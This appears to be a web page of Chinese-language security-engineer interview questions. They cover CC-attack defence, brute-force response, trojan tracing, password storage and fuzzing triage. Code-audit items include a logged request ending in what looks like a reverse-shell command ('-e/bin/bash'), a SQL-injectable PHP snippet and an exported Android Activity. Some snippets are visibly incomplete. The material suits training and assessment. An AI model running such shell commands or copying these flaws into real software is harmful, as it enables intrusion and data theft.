安全工程師簡(jiǎn)答題
簡(jiǎn)答題:
請(qǐng)列舉防御CC攻擊的方法
審計(jì)這條web請(qǐng)求,說(shuō)說(shuō)你的看法
http://www.hack.cn/hack.php?cmd= ... 80-e/bin/bash 200
你發(fā)現(xiàn)110.2.3.4正在暴力破解你所管理的服務(wù)器,你應(yīng)該如何處理?
硬件斷點(diǎn)和軟件點(diǎn)有什么不同?
從網(wǎng)絡(luò)流量上監(jiān)測(cè)到一臺(tái)Linux機(jī)器連接著一臺(tái)木馬控制端,在這臺(tái)機(jī)器上僅使用系統(tǒng)自帶的命令,如何定位出哪個(gè)是進(jìn)程連接的?
如果你設(shè)計(jì)一個(gè)賬號(hào)系統(tǒng),為保障密碼的安全,你會(huì)如何設(shè)計(jì)存儲(chǔ)密碼?
非對(duì)稱的加密算法可以用來(lái)加密,也可以用于簽名,請(qǐng)說(shuō)明什么場(chǎng)景下用來(lái)加密,什么情景下用來(lái)簽名?
ContentProvider是Android上負(fù)責(zé)提供數(shù)據(jù)讀寫的組件,應(yīng)用內(nèi)部或者應(yīng)用之間的數(shù)據(jù)共享與存儲(chǔ)都會(huì)使用 ContentProvider組件。 但在實(shí)際使用過(guò)程中,很容易出現(xiàn)各種安全問(wèn)題,請(qǐng)結(jié)合你實(shí)踐,描述一下在使用ContentProvider時(shí),所需要注意的事項(xiàng)。
現(xiàn)有一套針對(duì)某個(gè)jpg文件庫(kù)的`fuzz環(huán)境,每秒鐘可以執(zhí)行上千次fuzz實(shí)例,產(chǎn)生的crash很多,每次crash都有對(duì)應(yīng)的crash dump,請(qǐng)說(shuō)如初步何篩選出有價(jià)值的crash,如何確定某個(gè)特定的crash對(duì)應(yīng)的fuzz實(shí)例,以及如何確定一個(gè)crash是否是安全漏洞(假設(shè)我 們只關(guān)心緩沖區(qū)溢出漏洞)。
gcc編譯器支持的__attribute__ ((constructor))特性得以實(shí)現(xiàn)的底層機(jī)制跟ELF結(jié)構(gòu)的哪個(gè)部分有關(guān)系?這個(gè)部分在現(xiàn)實(shí)中哪些地方可以用到?
代碼審計(jì):
淘寶首頁(yè)以下代碼片段是否可能存在安全漏洞?如果有,請(qǐng)指出來(lái)并提供修復(fù)建議;如果沒(méi)有,說(shuō)明你判斷的理由
#set($url = $!request.getParameter('url'))
以下程序是否存在安全漏洞?如果有,請(qǐng)指出來(lái)并提供修復(fù)建議
交易狀態(tài):
以下程序是否存在安全漏洞?如果有,請(qǐng)指出來(lái)并提供修復(fù)建議。
$id=$_GET['id'];
$getacct = mysql_query("select * from orders where id='$id' and client id='$fnm->clientid") or dir(mysql_error());
while ($row = mysql_fetch_array($getacct))
{
acctid = $row["id"];
?>
Cpanel User:
}
?>
在Linux系統(tǒng)中,我們通常使用終端shell腳本處理一些數(shù)據(jù),十分高效便捷。
現(xiàn)在有以下兩個(gè)文件:
File1:
user passwd
Hoecker animal
Newbee 238H76N3
Buttes Paradis1
TRON995 fdcmdgeo
G60FgL LgEl9H
ozron44 oriole62
File2:
id user
001 Yosh405
002 Newbee
003 G60FgL
004 Hoecker
005 sudhakar0303
要求:
編寫一段shell腳本,輸出同時(shí)存在于File1和File2中用戶名的密碼。(可使用管道命令,只輸出密碼)
以下是一段導(dǎo)出Activity的onCreate和onNewIntent函數(shù)中的代碼,請(qǐng)找出其中的所有漏洞并說(shuō)明可能產(chǎn)生的危害:
其中:alibaba.test.sender是同樣由淘寶開發(fā)的另一個(gè)應(yīng)用程序的package name。
此Activity對(duì)應(yīng)的manifest文件中的定義:
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
String calling_package= getCallingPackage();
if (!calling_package.equals("alibaba.test.sender")){
return;
}
}
protected void onNewIntent (Intent intent){
super.onNewIntent(intent);
Intent intent = getIntent();
Intent rec_intent;
rec_intent=intent.getParcelableExtra("log_intent");
Date date = new Date();
rec_intent.putExtra("timestamp",date.getTime());
rec_intent.putExtra("EVENT_TYPE","activity_launched");
rec_intent.setAction("LOG_ACTION");
sendBroadcast(rec_intent, "TAOBAO_BROADCAST_RECEIVER");
}
【安全工程師簡(jiǎn)答題】相關(guān)文章:
安全工程師報(bào)考條件03-31
教師資格考試簡(jiǎn)答題答題技巧04-03
沖壓工程師簡(jiǎn)歷03-18
售前工程師簡(jiǎn)歷03-12
品質(zhì)工程師簡(jiǎn)歷03-12
模具工程師簡(jiǎn)歷03-10
QE工程師簡(jiǎn)歷03-09
ios工程師簡(jiǎn)歷03-04
工程師介紹信12-31